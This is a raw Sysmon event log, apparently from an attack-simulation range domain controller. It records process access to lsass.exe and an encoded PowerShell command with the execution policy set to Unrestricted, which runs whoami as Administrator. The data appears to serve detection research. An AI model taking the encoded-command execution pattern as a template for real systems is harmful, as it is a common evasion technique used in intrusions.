10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3E2F-5F80-7B00-000000007F01}47924812C:\Windows\system32\conhost.exe{733EE690-3E2F-5F80-7E00-000000007F01}4964C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E2F-5F80-7E00-000000007F01}4964C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3E2F-5F80-7D00-000000007F01}48684960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3E2F-5F80-7E00-000000007F01}4964C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9cdcde5b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26ece5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26e9b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9cd2001b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c22f54c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c28da1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c271080|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c271080|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c270f11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c262e96|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26f3c9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26efbc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26ece5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c26e9b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9cd2001b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c255817|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+9c254de7 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.233{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.230{733EE690-3E2F-5F80-7E00-000000007F01}4964C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E2F-5F80-73C7-040000000000}0x4c7730HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.170{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.170{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.124{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k2pm4vp5.gv5.ps12020-10-09 10:40:47.124 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.124{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3E2F-5F80-7B00-000000007F01}47924812C:\Windows\system32\conhost.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 